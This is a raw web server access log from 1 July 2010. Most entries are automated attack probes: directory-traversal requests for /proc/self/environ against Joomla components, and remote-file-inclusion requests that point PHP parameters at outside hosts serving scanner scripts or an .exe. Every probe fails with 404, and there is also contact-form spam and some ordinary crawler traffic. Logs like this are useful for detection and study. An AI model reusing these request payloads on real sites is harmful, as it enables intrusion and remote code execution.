75.125.43.162 - - [01/Jul/2010:08:47:11 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
75.125.43.162 - - [01/Jul/2010:08:47:11 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
75.125.43.162 - - [01/Jul/2010:08:47:11 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
75.125.43.162 - - [01/Jul/2010:08:47:11 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
75.125.43.162 - - [01/Jul/2010:08:47:11 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
75.125.43.162 - - [01/Jul/2010:08:47:11 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
75.125.43.162 - - [01/Jul/2010:08:47:11 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
75.125.43.162 - - [01/Jul/2010:08:47:12 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
75.125.43.162 - - [01/Jul/2010:08:47:12 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
75.125.43.162 - - [01/Jul/2010:08:47:12 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
75.125.43.162 - - [01/Jul/2010:08:47:12 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
75.125.43.162 - - [01/Jul/2010:08:47:12 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
203.252.71.232 - - [01/Jul/2010:08:51:28 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:08:51:41 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:08:52:00 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:08:52:07 -0500] "GET /logs/access_log.1275696000//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:08:52:07 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:08:52:07 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:08:52:08 -0500] "GET /logs/access_log.1277078400//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:08:52:37 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:08:52:37 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:08:52:37 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:08:52:56 -0500] "GET /logs/access_log.1277164800//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:08:52:56 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:08:52:56 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.71.245.122 - - [01/Jul/2010:08:53:02 -0500] "GET /logs/access_log.1275782400//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.831"
66.71.245.122 - - [01/Jul/2010:08:53:02 -0500] "GET //admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.831"
66.71.245.122 - - [01/Jul/2010:08:53:02 -0500] "GET /logs//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 304 "-""libwww-perl/5.831"
203.252.71.232 - - [01/Jul/2010:08:53:40 -0500] "GET /logs/access_log.1276041600//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
66.71.245.122 - - [01/Jul/2010:08:53:51 -0500] "GET /logs/access_log.1275782400//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.831"
66.71.245.122 - - [01/Jul/2010:08:53:51 -0500] "GET //admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.831"
66.71.245.122 - - [01/Jul/2010:08:53:51 -0500] "GET /logs//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 304 "-""libwww-perl/5.831"
174.142.75.205 - - [01/Jul/2010:08:54:17 -0500] "GET /logs/access_log.1277164800//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 369 "-""libwww-perl/5.805"
174.142.75.205 - - [01/Jul/2010:08:54:17 -0500] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
174.142.75.205 - - [01/Jul/2010:08:54:17 -0500] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
66.71.245.122 - - [01/Jul/2010:08:54:24 -0500] "GET /logs/access_log.1275782400//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.831"
66.71.245.122 - - [01/Jul/2010:08:54:24 -0500] "GET //admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.831"
66.71.245.122 - - [01/Jul/2010:08:54:24 -0500] "GET /logs//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 304 "-""libwww-perl/5.831"
66.249.71.185 - - [01/Jul/2010:08:54:41 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.185 - - [01/Jul/2010:08:54:41 -0500] "GET /logs/access_log.1272844800 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
174.142.75.205 - - [01/Jul/2010:08:54:59 -0500] "GET /logs/access_log.1275264000//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 369 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:08:55:02 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:08:55:03 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:08:55:03 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.142.75.205 - - [01/Jul/2010:08:55:09 -0500] "GET /logs/access_log.1275264000%20//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 370 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:08:55:10 -0500] "GET /logs/access_log.1277164800//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
66.71.245.122 - - [01/Jul/2010:08:55:24 -0500] "GET /logs/access_log.1275091200//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.831"
203.252.71.232 - - [01/Jul/2010:08:55:31 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:08:55:32 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:08:55:33 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:08:55:43 -0500] "GET /logs/access_log.1277164800//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
66.71.245.122 - - [01/Jul/2010:08:56:15 -0500] "GET /logs/access_log.1275091200//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.831"
66.71.245.122 - - [01/Jul/2010:08:56:21 -0500] "GET /logs/access_log.1275782400//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.831"
66.71.245.122 - - [01/Jul/2010:08:56:21 -0500] "GET //admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.831"
66.71.245.122 - - [01/Jul/2010:08:56:21 -0500] "GET /logs//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 304 "-""libwww-perl/5.831"
66.71.245.122 - - [01/Jul/2010:08:56:50 -0500] "GET /logs/access_log.1275091200//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.831"
203.252.71.232 - - [01/Jul/2010:08:57:09 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
66.71.245.122 - - [01/Jul/2010:08:58:39 -0500] "GET /logs/access_log.1275091200//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.831"
211.210.38.8 - - [01/Jul/2010:08:59:26 -0500] "GET /logs/access_log.1276473600/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
211.210.38.8 - - [01/Jul/2010:08:59:26 -0500] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
211.210.38.8 - - [01/Jul/2010:08:59:27 -0500] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
203.252.71.232 - - [01/Jul/2010:08:59:38 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
92.241.190.214 - - [01/Jul/2010:09:01:05 -0500] "GET /logs/access_log.1275782400//admin/auth.php?xcart_dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
92.241.190.214 - - [01/Jul/2010:09:01:05 -0500] "GET //admin/auth.php?xcart_dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
92.241.190.214 - - [01/Jul/2010:09:01:06 -0500] "GET /logs//admin/auth.php?xcart_dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:09:01:07 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:09:02:17 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.54.21.189 - - [01/Jul/2010:09:02:40 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://www.facebook.com/pages/Kostum/109407852410242?v=stream&ref=ts""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; de-de) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
78.54.21.189 - - [01/Jul/2010:09:02:40 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; de-de) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
78.54.21.189 - - [01/Jul/2010:09:02:42 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; de-de) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
78.54.21.189 - - [01/Jul/2010:09:02:43 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; de-de) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
78.54.21.189 - - [01/Jul/2010:09:02:43 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; de-de) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
78.54.21.189 - - [01/Jul/2010:09:02:43 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; de-de) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
211.210.38.8 - - [01/Jul/2010:09:03:02 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
92.241.190.214 - - [01/Jul/2010:09:03:48 -0500] "GET /logs/access_log.1275091200//admin/auth.php?xcart_dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
211.210.38.8 - - [01/Jul/2010:09:04:59 -0500] "GET /logs/access_log.1277164800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
211.210.38.8 - - [01/Jul/2010:09:04:59 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
211.210.38.8 - - [01/Jul/2010:09:05:00 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
211.210.38.8 - - [01/Jul/2010:09:05:41 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
203.252.71.232 - - [01/Jul/2010:09:06:15 -0500] "GET /logs/access_log.1276041600//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:09:06:15 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:09:06:15 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
208.97.178.20 - - [01/Jul/2010:09:09:27 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
208.97.178.20 - - [01/Jul/2010:09:09:27 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
208.97.178.20 - - [01/Jul/2010:09:09:28 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
203.252.71.232 - - [01/Jul/2010:09:10:17 -0500] "GET /logs/access_log.1274832000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:09:10:17 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:09:10:18 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.210.38.8 - - [01/Jul/2010:09:10:33 -0500] "GET /logs/access_log.1277164800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
211.210.38.8 - - [01/Jul/2010:09:10:33 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
211.210.38.8 - - [01/Jul/2010:09:10:34 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
203.252.71.232 - - [01/Jul/2010:09:11:07 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.210.38.8 - - [01/Jul/2010:09:13:58 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
203.252.71.232 - - [01/Jul/2010:09:14:53 -0500] "GET /logs/access_log.1276819200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:09:14:54 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:09:14:54 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
92.60.176.46 - - [01/Jul/2010:09:17:51 -0500] "GET //appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 302 "-""Mozilla/5.0"
92.60.176.46 - - [01/Jul/2010:09:17:51 -0500] "GET //appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 302 "-""Mozilla/5.0"
92.60.176.46 - - [01/Jul/2010:09:17:51 -0500] "GET /logs//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 307 "-""Mozilla/5.0"
92.60.176.46 - - [01/Jul/2010:09:17:51 -0500] "GET /logs/access_log.1274572800//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 329 "-""Mozilla/5.0"
92.60.176.46 - - [01/Jul/2010:09:17:51 -0500] "GET /logs/access_log.1274572800//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 329 "-""Mozilla/5.0"
92.60.176.46 - - [01/Jul/2010:09:17:51 -0500] "GET /logs//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 307 "-""Mozilla/5.0"
92.60.176.46 - - [01/Jul/2010:09:19:24 -0500] "GET /logs/access_log.1266710400//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 329 "-""Mozilla/5.0"
92.60.176.46 - - [01/Jul/2010:09:20:00 -0500] "GET /logs/access_log.1266710400//appserv/main3.php?appserv_root=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 329 "-""Mozilla/5.0"
193.231.187.33 - - [01/Jul/2010:09:20:03 -0500] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
193.231.187.33 - - [01/Jul/2010:09:20:03 -0500] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
193.231.187.33 - - [01/Jul/2010:09:20:03 -0500] "GET /logs/access_log.1277164800//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 369 "-""libwww-perl/5.810"
203.252.71.232 - - [01/Jul/2010:09:20:11 -0500] "GET /logs/access_log.1274832000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:09:20:11 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:09:20:11 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
121.78.118.123 - - [01/Jul/2010:09:21:43 -0500] "GET /logs/access_log.1276300800//index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
121.78.118.123 - - [01/Jul/2010:09:21:43 -0500] "GET //index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.78.118.123 - - [01/Jul/2010:09:21:44 -0500] "GET /logs//index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
203.252.71.232 - - [01/Jul/2010:09:23:37 -0500] "GET /logs/access_log.1276041600//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
207.46.199.183 - - [01/Jul/2010:09:34:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.20.196.20 - - [01/Jul/2010:09:36:03 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:36:04 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:36:04 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:36:04 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:36:04 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:36:04 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:36:04 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:36:04 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:36:04 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:36:05 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:36:05 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:36:05 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:36:05 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:36:05 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:36:05 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:36:06 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:36:06 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:09:36:06 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.195.112.180 - - [01/Jul/2010:09:41:31 -0500] "GET /logs/access_log.1265241600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.175.94.58 - - [01/Jul/2010:09:43:02 -0500] "GET //displayCategory.php?basepath=ftp://66.210.47.200/v6id.exe??%0D?? HTTP/1.1" 404 304 "-""libwww-perl/5.834"
69.175.94.58 - - [01/Jul/2010:09:43:02 -0500] "GET /logs//displayCategory.php?basepath=ftp://66.210.47.200/v6id.exe??%0D?? HTTP/1.1" 404 309 "-""libwww-perl/5.834"
69.175.94.58 - - [01/Jul/2010:09:43:02 -0500] "GET /logs/access_log.1274572800//displayCategory.php?basepath=ftp://66.210.47.200/v6id.exe??%0D?? HTTP/1.1" 404 331 "-""libwww-perl/5.834"
66.191.139.210 - - [01/Jul/2010:09:43:37 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
66.191.139.210 - - [01/Jul/2010:09:43:37 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
66.191.139.210 - - [01/Jul/2010:09:43:37 -0500] "GET /logs/access_log.1277424000%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 379 "-""Mozilla/5.0"
66.191.139.210 - - [01/Jul/2010:09:43:39 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
66.191.139.210 - - [01/Jul/2010:09:43:39 -0500] "GET /logs/access_log.1277424000%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 379 "-""Mozilla/5.0"
66.191.139.210 - - [01/Jul/2010:09:43:39 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
